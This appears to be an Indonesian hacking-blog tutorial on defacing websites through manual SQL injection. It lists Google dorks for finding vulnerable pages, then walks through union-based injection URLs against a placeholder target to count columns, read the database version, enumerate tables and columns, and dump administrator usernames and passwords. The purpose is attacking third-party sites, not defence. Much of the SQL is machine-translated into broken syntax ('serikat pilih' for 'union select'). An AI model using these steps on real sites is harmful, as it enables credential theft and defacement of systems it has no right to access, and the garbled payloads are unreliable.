Deface SQL Injection [ Manual ]
Halo bosq Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Tutorial Deface SQL Injection [ Manual ]
Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini
SQL Injection adalah metode untuk hack website dengan menyuntikkan script sql di dalamnya. SQL Injection digunakan untuk berkomunikasi dengan database website
Deface SQL Injection [ Manual ]
Dorking :
- inurl:? index.php id =
- inurl:? admin.php id =
- inurl:? pages.php id =
- inurl:? pages.php id =
copy dan paste salah satu script di Google seperti inurl:? id = index.php
2. Pilih salah Satu Web
Contoh => www.target.com/index.php?id=1
3. Sekarang Anda harus menambahkan ( ') pada akhir URL
contoh => www.target.com/index.php?id=1'
jika Anda mendapatkan error seperti ### Anda memiliki kesalahan pada MYSQL ###
website ini rentan terhadap injeksi sql.
4. Sekarang kita harus mencari jumlah kolom
www.target.com/index.php?id=1 order by 10-- (ERROR)
www.target.com/index.php?id=1 order by 9-- (ERROR)
www.target.com/index.php?id=1 order by 8-- (ERROR)
www.target.com/index.php?id=1 order by 7-- (NO ERROR)
jumlah kolom 7 tidak menunjukkan acara apapun sehingga kita dapat dengan mudah mengatakan jumlah kolom 7
5. Sekarang kita harus menemukan kolom rentan
serikat www.target.com/index.php?id=1pilih 1,2,3,4,5,6,7--
jika menunjukkan angka 2 kolom maka rentan adalah 2
6. kita harus menemukan versi database
www.target.com/index.php?id=1 serikat pilih 1, @@ version, 3,4,5,6,7--
Mengganti kolom rentan dengan "@@ version"
jika menunjukkan versi 5.1 log maka untuk bisa melanjutkan ke langkah berikutnya
7. Sekarang menemukan nama database
serikat www.target.com/index.php?id=1pilih 1group_concat (schema_name), 3,4,5,6,7 dari information_schema.schemata--
ia akan menampilkan nama data base biarkan nama data base adalah "dunia"
8. Sekarang menemukan nama semua tabel
union www.target.com/index.php?id=1 pilih 1, concat (table_name), 3,4,5,6,7 dari information_schema.tables mana table_schema = database yang () -
ia akan menampilkan banyak nama tabel kita harus menemukan hanya admin atau pengguna jenis nama tabel
biarkan kita menemukan nama tabel "administrator"
9. Sekarang kita harus mencari nama kolom
union www.target.com/index.php?id=1 pilih 1, concat (column_name), 3,4,5,6,7 dari information_schema.columns mana table_schema = database yang ()
kita semua melihat banyak tidak ada nama kolom kita hanya harus menemukan user_name dan password
biarkan kita memiliki nama dua kolom user_name dan pass_word.
10. Sekarang menemukan password dari user_name
www.target.com/index.php?id=1 serikat pilih 1, concat (user_name, 0x3a, pass_word), 3,4,5,6,7 dari world.administrator
itu akan menampilkan username dan password Kita
Sekian
Hello, my name is Mr fr00g53rr0r. I'm a 18 year old self-employed Pirate from the Caribbean.
Tidak ada komentar:
Posting Komentar